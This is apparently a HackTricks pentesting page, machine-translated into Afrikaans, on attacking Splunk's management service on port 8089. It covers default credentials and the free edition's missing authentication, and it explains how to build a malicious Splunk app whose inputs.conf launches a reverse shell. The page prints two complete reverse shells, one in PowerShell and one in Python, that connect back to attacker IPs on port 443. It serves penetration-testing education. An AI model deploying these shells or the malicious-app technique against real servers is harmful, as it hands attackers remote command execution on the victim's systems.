# 8089 - Pentesting Splunkd {{#include ../banners/hacktricks-training.md}} ## **Basiese Inligting** - Log analitiese hulpmiddel wat gebruik word vir data versameling, analise, en visualisering - Gewoonlik gebruik in sekuriteitsmonitering en besigheidsanalise - Standaard poorte: - Webbediener: 8000 - Splunkd diens: 8089 ### Kwetsbaarheid Vektore: 1. Gratis Weergawe Exploitatie - Proefweergawe omskakel outomaties na gratis weergawe na 60 dae - Gratis weergawe ontbreek outentisering - Potensiële sekuriteitsrisiko as dit onbeheerd gelaat word - Administrateurs mag sekuriteitsimplikasies oor die hoof sien 2. Kredensiaal Swakhede - Ou weergawe: Standaard kredensiale `admin:changeme` - Nuwe weergawes: Kredensiale ingestel tydens installasie - Potensiaal vir swak wagwoord gebruik (bv. `admin`, `Welcome`, `Password123`) 3. Afgeleë Kode Uitvoering Geleenthede - Meerdere kode uitvoeringsmetodes: - Bediener-kant Django toepassings - REST eindpunte - Geskrifte insette - Waarskuwing geskrifte - Kruis-platform ondersteuning (Windows/Linux) - Geskrifte insette kan loop: - Bash geskrifte - PowerShell geskrifte - Batch geskrifte Sleutel Exploitatie Potensiaal: - Sensitiewe data stoor - Gebrek aan outentisering in gratis weergawe - Meerdere vektore vir potensiële afgeleë kode uitvoering - Moontlikheid om geskrifte insette te benut vir stelselskompromie ### Shodan - `Splunk bou` ## RCE ### Skep Aangepaste Toepassing Splunk bied 'n gesofistikeerde metode vir afgeleë kode uitvoering deur middel van aangepaste toepassingsontplooiing, wat sy kruis-platform skripting vermoëns benut. Die kern exploitatie tegniek draai om die skep van 'n kwaadwillige toepassing wat omgekeerde skale op beide Windows en Linux stelsels kan uitvoer. 'n Aangepaste toepassing kan **Python, Batch, Bash, of PowerShell geskrifte** uitvoer. Boonop, **Splunk kom met Python geïnstalleer**, so selfs in **Windows** stelsels sal jy in staat wees om python kode uit te voer. Jy kan [**hierdie**](https://github.com/0xjpuff/reverse_shell_splunk) voorbeeld gebruik met die **`bin`** wat 'n voorbeeld bevat vir [Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) en [PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1). Of jy kan jou eie skep. Die exploitatie proses volg 'n konsekwente metodologie oor platforms: ``` splunk_shell/ ├── bin (reverse shell scripts) └── default (inputs.conf configuration) ``` Die kritieke konfigurasie lêer `inputs.conf` aktiveer die skrip deur: - `disabled = 0` in te stel - 'n 10-sekonde uitvoeringsinterval te konfigureer - Die skrip se brontipe te definieer Ontplooiing is eenvoudig: 1. Skep die kwaadwillige toepassingspakket 2. Stel 'n luisteraar (Netcat/socat) op die aanvalmasjien in 3. Laai die toepassing op deur Splunk se koppelvlak 4. Trigger outomatiese skripuitvoering by opgelaai Voorbeeld Windows PowerShell omgekeerde skulp: ```powershell $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close() ``` Voorbeeld Linux Python omgekeerde dop: ```python import sys, socket, os, pty ip = "10.10.14.15" port = "443" s = socket.socket() s.connect((ip, int(port))) [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] pty.spawn('/bin/bash') ``` ### RCE & Privilege Escalation In die volgende bladsy kan jy 'n verduideliking vind oor hoe hierdie diens misbruik kan word om voorregte te verhoog en volharding te verkry: {{#ref}} ../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md {{#endref}} ## References - [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213) {{#include ../banners/hacktricks-training.md}}